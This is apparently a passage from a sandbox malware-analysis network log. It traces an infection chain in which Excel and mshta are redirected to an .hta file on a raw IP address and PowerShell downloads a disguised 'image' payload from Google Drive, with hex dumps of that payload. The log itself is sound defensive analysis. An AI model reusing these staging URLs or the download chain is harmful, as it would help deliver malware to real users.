                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:14:12 GMT
                                                                                                                                                                                                                  Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-XSI_8PMP0t8jQ-AzVX7bSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  3192.168.2.2249167142.250.185.654432140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-10-31 04:14:13 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                                                                                                                                                  Host: drive.usercontent.google.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-10-31 04:14:15 UTC4906INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                  Content-Length: 2239109
                                                                                                                                                                                                                  Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                                                                                                                                                  X-GUploader-UploadID: AHmUCY0v_i1jcUM1-4p7cgNp5E7I5Iun0KR3AXN-c5U7pfqFcdJ_cRz9lFQa2Trqy9mQTzd_MqLhkzgPfQ
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:14:15 GMT
                                                                                                                                                                                                                  Expires: Thu, 31 Oct 2024 04:14:15 GMT
                                                                                                                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                                                                                                                  X-Goog-Hash: crc32c=WqxmdA==
                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2024-10-31 04:14:15 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                                                                  2024-10-31 04:14:16 UTC4886INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                                                                                                                                                                                                  Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
                                                                                                                                                                                                                  2024-10-31 04:14:16 UTC1323INData Raw: 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23
                                                                                                                                                                                                                  Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#
                                                                                                                                                                                                                  2024-10-31 04:14:16 UTC1378INData Raw: 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4
                                                                                                                                                                                                                  Data Ascii: I@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve
                                                                                                                                                                                                                  2024-10-31 04:14:16 UTC1378INData Raw: b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da
                                                                                                                                                                                                                  Data Ascii: cf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(
                                                                                                                                                                                                                  2024-10-31 04:14:16 UTC1378INData Raw: 0e 51 21 52 69 af da f1 39 f6 b2 96 08 c5 98 50 be d8 58 85 a9 12 bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6
                                                                                                                                                                                                                  Data Ascii: Q!Ri9PX1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/
                                                                                                                                                                                                                  2024-10-31 04:14:16 UTC1378INData Raw: 1a 88 d4 12 59 54 13 5b be 27 af c8 e2 ad b4 01 4a 40 bc d0 d5 13 ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6
                                                                                                                                                                                                                  Data Ascii: YT['J@v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,
                                                                                                                                                                                                                  2024-10-31 04:14:16 UTC1378INData Raw: f0 1a af 0a 7d 3c 28 c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d
                                                                                                                                                                                                                  Data Ascii: }<(Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}
                                                                                                                                                                                                                  2024-10-31 04:14:16 UTC1378INData Raw: cb ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5
                                                                                                                                                                                                                  Data Ascii: txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De
                                                                                                                                                                                                                  2024-10-31 04:14:16 UTC1378INData Raw: c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74
                                                                                                                                                                                                                  Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-Tt


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  4192.168.2.2249168172.67.162.954433460C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-10-31 04:14:15 UTC383OUTGET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                  Host: acesso.run
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-10-31 04:14:16 UTC1058INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:14:16 GMT
                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 99
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                  Location: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta
                                                                                                                                                                                                                  Vary: Accept
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IfJ3oYdqVsBxA9VMFybpp17R33ZcV0ZISkKZqTL1q%2B%2FM5R6KXY7nkxIGRciiEYFLQU6Azh%2BI6gvhSc6VzDhc2Q2LsW8gNKhy8cnEH39%2FdRxCi8o33kHai%2FSGi5rL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8db0d135d87eddae-DFW
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1222&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=965&delivery_rate=2407315&cwnd=32&unsent_bytes=0&cid=191f58b731bcc288&ts=458&x=0"
                                                                                                                                                                                                                  2024-10-31 04:14:16 UTC99INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 34 2e 31 34 36 2e 34 36 2f 35 37 2f 6e 6f 63 2f 65 72 6e 61 73 68 67 65 74 6d 65 62 61 63 6b 77 69 74 68 67 6f 6f 64 6e 65 77 73 77 68 69 63 68 67 72 72 65 61 74 74 68 69 6e 67 73 2e 68 74 61
                                                                                                                                                                                                                  Data Ascii: Found. Redirecting to http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  5192.168.2.2249171104.21.74.1914433004C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-10-31 04:14:18 UTC407OUTGET /KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain HTTP/1.1
                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                  Host: acesso.run
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-10-31 04:14:19 UTC1060INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:14:19 GMT
                                                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 99
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                  Location: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta
                                                                                                                                                                                                                  Vary: Accept
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2F%2F7J%2F3qDsOfqojqd%2FRsXi5dCeVvXKZcAvZUjqZW3xnk69P7gYjRNulY8LHDu4lTkIlA6%2F1wN4lS7PVNslvqjU8fbhKWTClIMzeV9QlhRF%2B1OBJ39vBeRpv0mfql"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8db0d1484dba47a2-DFW
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=978&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=989&delivery_rate=2898898&cwnd=251&unsent_bytes=0&cid=b907ffc37a0d5bb2&ts=560&x=0"
                                                                                                                                                                                                                  2024-10-31 04:14:19 UTC99INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 34 2e 31 34 36 2e 34 36 2f 35 37 2f 6e 6f 63 2f 65 72 6e 61 73 68 67 65 74 6d 65 62 61 63 6b 77 69 74 68 67 6f 6f 64 6e 65 77 73 77 68 69 63 68 67 72 72 65 61 74 74 68 69 6e 67 73 2e 68 74 61
                                                                                                                                                                                                                  Data Ascii: Found. Redirecting to http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  6192.168.2.2249173142.250.184.2064433972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-10-31 04:14:33 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                                                                                                                                                  Host: drive.google.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-10-31 04:14:33 UTC1319INHTTP/1.1 303 See Other
                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 04:14:33 GMT
                                                                                                                                                                                                                  Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-G34-iEgNxYHExZuvw34W9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                  X-XSS-Protection: 0
